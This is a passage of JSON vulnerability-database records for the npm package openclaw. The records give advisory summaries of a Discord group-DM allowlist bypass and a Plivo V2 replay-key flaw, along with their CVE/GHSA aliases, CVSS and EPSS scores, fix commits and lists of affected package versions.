                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-41295",
                "GHSA-2qrv-rc5x-2g2h"
            ],
            "risk_score": 3.9,
            "exploitability": "0.5",
            "weighted_severity": "7.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-una1-gxkk-t3bp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89664?format=api",
            "vulnerability_id": "VCID-uy97-p1ex-y7df",
            "summary": "OpenClaw: Discord Slash Commands Bypass Group DM Channel Allowlist\n## Summary\nDiscord Slash Commands Bypass Group DM Channel Allowlist\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: moderate\n- Assessment: v2026.3.28 native Discord slash and autocomplete paths still skip the group-DM allowlist, but impact is limited to already-authorized Discord users bypassing a channel restriction rather than crossing a stronger trust boundary.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8fdb19676ab44cf85d47ee13c578195f2e527591` — 2026-03-30T11:17:36-06:00\n\nOpenClaw thanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41348",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10417",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10395",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10436",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41348"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8fdb19676ab44cf85d47ee13c578195f2e527591",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8fdb19676ab44cf85d47ee13c578195f2e527591"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rvvf-6vh3-9j43",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rvvf-6vh3-9j43"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41348",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41348"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-group-dm-channel-allowlist-bypass-via-discord-slash-commands",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-group-dm-channel-allowlist-bypass-via-discord-slash-commands"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rvvf-6vh3-9j43",
                    "reference_id": "GHSA-rvvf-6vh3-9j43",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rvvf-6vh3-9j43"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41348",
                "GHSA-rvvf-6vh3-9j43"
            ],
            "risk_score": 2.5,
            "exploitability": "0.5",
            "weighted_severity": "4.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uy97-p1ex-y7df"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91856?format=api",
            "vulnerability_id": "VCID-v1bp-hw9a-yffz",
            "summary": "OpenClaw: Plivo V2 verified replay identity drifts on query-only variants\n## Summary\nBefore `v2026.3.23`, the Plivo V2 verification path treated query-only variants of the same signed request as fresh verified work. Plivo V2 signatures authenticate `baseUrl + nonce`, but the replay key was derived from the full verification URL including the query string, so unsigned query-only changes minted a new `verifiedRequestKey`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable logic lived in `extensions/voice-call/src/webhook-security.ts`. V2 signature validation already canonicalized to the base URL without query parameters, but the replay key used the full `verificationUrl`, so a request that differed only in its unsigned query string received a new replay key and was not recognized as a replay of the original signed request.\n\n## Fix Commit(s)\n- `b0ce53a79cf63834660270513e26d921899b4e5b` — `fix(voice-call): stabilize plivo v2 replay keys`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `extensions/voice-call/src/webhook-security.ts` now derives the V2 replay key with `createPlivoV2ReplayKey(...)`, which hashes `getBaseUrlNoQuery(url)` plus the nonce.\n- `extensions/voice-call/src/webhook-security.test.ts` contains the regression test `treats query-only V2 variants as the same verified request`.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35618",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.133",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13342",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13338",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35618"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35618",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35618"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cg6c-q2hx-69h7",
                    "reference_id": "GHSA-cg6c-q2hx-69h7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cg6c-q2hx-69h7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.23",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
